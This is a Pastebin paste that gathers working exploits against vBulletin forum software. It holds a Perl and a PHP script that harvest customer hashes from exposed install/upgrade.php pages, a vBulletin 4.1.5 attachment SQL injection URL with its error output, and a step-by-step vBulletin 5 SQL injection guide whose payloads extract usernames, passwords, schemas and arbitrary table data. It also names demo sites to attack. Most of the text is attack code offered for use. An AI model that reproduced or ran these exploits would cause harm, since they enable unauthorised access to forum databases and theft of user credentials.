Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- vBulletin x.x.x Customer Area 0day
- -------------------------------------------------
- vBulletin x.x.x Customer Area 0day
- Perl script got leaked so decided to post the perl script here
- Code:
- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTTP::Request::Common;
- system('cls');
- system('title vBulletin Install Auto Exploiter');
- print "\n ---------------------------------------";
- print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
- print " ---------------------------------------\n";
- print " + d4tabase.com -+- d4tabase.com + ";
- print "\n ---------------------------------------\n";
- print " coded by n0tch shoutz d4tabase crew ";
- print "\n ---------------------------------------\n";
- if($#ARGV == -1 or $#ARGV > 0)
- {
- print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
- exit;
- }
- $domain = $ARGV[0];
- $install_dir = "install";
- $full_domain = "http://$domain/$install_dir/upgrade.php";
- chop($domain);
- &search;
- sub search
- {
- $url = $full_domain;
- $lwp = LWP::UserAgent->new();
- $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
- $request = $lwp->post($url, ["searchHash" => "Search"]);
- print " Searching $domain ----\n ";
- if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
- {
- print "Result : $1\n";
- } else {
- print "Hash: Hash not found!\n";
- }
- }
- php exploit -
- --------------------
- <?php
- set_time_limit(0);
- if($argc < 2) {
- echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
- exit;
- }
- $URL = $argv[1];
- $arr = parse_url($URL);
- ### work with url
- if(strpos($URL, '?')) die("Ohh, your URL is not valid");
- if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
- if(!$arr['scheme']) $URL = 'http://' . $URL;
- $headers = get_headers($URL . '/install/upgrade.php');
- if(substr($headers[0], 9, 3) == '200') {
- $source = file_get_contents($URL . "/install/upgrade.php");
- }
- elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
- if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
- }
- else die("something went wrong...");
- preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
- foreach ($res[1] as $hash) {
- echo "Hash: " . $hash . PHP_EOL;
- $fp = fopen("hash.txt", "a+");
- fwrite($fp, $hash . PHP_EOL);
- }
- ?>
- ------------------------------------------------------------------------
- vbulletin 4.1.5 attachment SQLI
- vbulletin 4.1.5 attachment SQLI
- examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values [f]" insert our SQL query. Example:
- Code:
- http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
- After that, we see the standard error of the database offline, thus opening the source code of the page and see:
- Code:
- <! -
- Database error in vBulletin 4.1.5 :
- Invalid SQL :
- SELECT
- permissionsfrom , Hidden , setpublish , publishdate , userid
- FROM ds23fSDdfsdf_cms_node
- WHERE
- nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
- MySQL Error : Duplicate column Name .1.49-3 '5 '
- Error Number : 1060
- Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
- Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
- Address : 127.0.0.1
- Username : Hacker
- Classname : vB_Database
- MySQL Version :
- ->
- ----------------------------------------------
- vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
- _ _ _ _ _____ _____ ___ _____ _ ______
- | | | | | | | | | _ | | _ |/ _ \ |_ _| (_) | ___|
- | |_| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_\ \ | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___
- | _ |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__/ _ \| |/ _` | '_ \| _/ _ \| '__/ _` |/ _ \
- | | | | (_| | (__| <| |_| | (_| | | | (_| | \ |_/ /> <\ |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/
- \_| |_/\__,_|\___|_|\_\\__, |\__,_|_| \__,_| \___//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|
- __/ | _/ | __/ |
- |___/ |__/ |___/
- ____ ____ __ _ ______ ____ ____
- _ __/ __ )__ __/ / /__ / /_(_)___ / ____/ / __ \/ __ \____ ___ __
- | | / / __ / / / / / / _ \/ __/ / __ \ /___ \ / / / / / / / __ `/ / / /
- | |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ /
- |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, /
- /____/
- ************************************************** ****************
- #Title: vBulletin 5 SQL Injection > Beta Whatever
- #Author: 0x0A
- #Date: Dec 11, 2012
- #Category: web application
- #Type: SQL Injection
- #Requirements: Firefox/Live HTTP Headers/
- #Software Link: http://www.vbulletin.com/purchases/
- http://www.vbulletin.com/features/
- #Homepage: hackyard.net
- ***********.com
- #Version: 5 and above(not older versions)
- #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
- #Demo sites to try: http://www.sultantheme.com/vb5connectforum/
- http://vb5connect.com/bb/
- ************************************************** ****************
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- How to
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- [#1] First of all, make an account to the vBulletin 5 forum,
- http://img402.imageshack.us/img402/7784/69376730.png
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
- http://imageshack.us/a/img12/305/89268702.png
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
- http://imageshack.us/a/img707/9990/68621087.png
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- [#4] Then, on Send POST Content use this:
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------
- http://imageshack.us/a/img42/1590/26447606.png
- //Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
- The following SQLi command will fetch out the first record from user table(username/password).
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- [#Other SQLi Syntaxes]
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Version():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |User():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Database():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Database Print:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Table Count:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Print Tables:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Columns of selected table:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Fetch Out Data:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- -------------------------------------------------------------------
- ================================================== =================
- -------------------------------------------------------------------
- |
- \ ' /
- -- (*) --
- >*<
- >0<@<
- >>>@<<*
- >@>*<0<<<
- >*>>@<<<@<<
- >@>>0<<<*<<@<
- >*>>0<<@<<<@<<<
- >@>>*<<@<>*<<0<*<
- \*/ >0>>*<<@<>0><<*<@<<
- ___\\U//___ >*>>@><0<<*>>@><*<0<<
- |\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<<
- | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
- |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
- Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_
- """"|'.'.'.|~~|.*.*.*| ____|_
- |'.'.'.| |____|>>>>>>|
- ~~~~~~~~ '""""`------'
- ----------------------------------------------------
- ==[ That`s it!
- ==[ Thanks, 0x0A!
- ==[ Romania
- ----------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement